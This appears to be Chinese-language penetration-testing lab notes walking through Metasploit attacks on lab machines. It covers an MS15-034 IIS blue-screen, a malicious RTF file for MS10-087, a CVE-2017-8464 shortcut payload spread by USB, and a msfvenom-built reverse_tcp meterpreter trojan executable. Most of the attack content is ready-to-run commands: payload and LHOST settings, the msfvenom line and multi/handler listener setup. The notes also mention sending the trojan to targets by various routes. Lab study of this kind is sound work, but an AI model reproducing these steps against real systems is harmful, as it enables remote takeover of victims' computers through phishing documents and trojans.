一、MS15-034(CVE-2015-1635) 远程执行代码漏洞(IIS漏洞)
远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034)。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
1.准备:
靶机:win7 IP:10.0.0.199
安装IIS中间件
控制面板-程序-程序和功能-打开或关闭Windows功能
依然是使用经典六步,此处不再赘述。
结果,出现蓝屏。
二、MS10-087 应用软件格式渗透
应用软件格式渗透,利用word去渗透,实现软件钓鱼。
靶机:win XP,IP:10.0.0.6。
在靶机上安装office 2003。
msf.rtf即为木马文件。
将此文件改名:set filename 123.rtf
运行:exploit
此时屏幕出现文件路径。
复制到tmp目录下:cp /root/.msf4/local/123.rtf /tmp/123.rtf
上传到靶机中:sz 123.rtf
靶机一旦打开该文件,kali本地即可监听。sessions -i 查看建立会话。
三、CVE-2017-8464:震网三代,远程快捷方式漏洞
需要将病毒放在U盘上,打开U盘文件的时候实现监听。(用处不大)
当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
受影响版本:
Windows 7
Windows 8.1
Windows RT 8.1
Windows 10
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
实验验证:
靶机win xp,IP:10.0.0.6
需要设置一个方向payload: set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 10.0.0.9
之后会在/root/.msf4/local目录下生成我们的利用文件。
注意:kali2.0下无法直接访问该文件夹,可通过命令行将/root/.msf4/local/下的所有文件复制到/root/1下。
cp -r /root/.msf4/local/ /root/1
全部复制到移动磁盘里面(u盘拷贝),然后在msf中监听:
search multi/handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST (本地IP)
exploit
四、MSF木马生成(.exe)
原理:在本地kali机上开两个窗口,一个生成木马;一个在msfconsole下监听。
木马生成:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.9 LPORT=5555 -f exe -o mumawenjian.exe
(在当前目录下生成文件)
把文件通过不同途径发送到靶机,例xp,在靶机上打开,相当于小型的“灰鸽子”。
本地监听:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.0.9
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit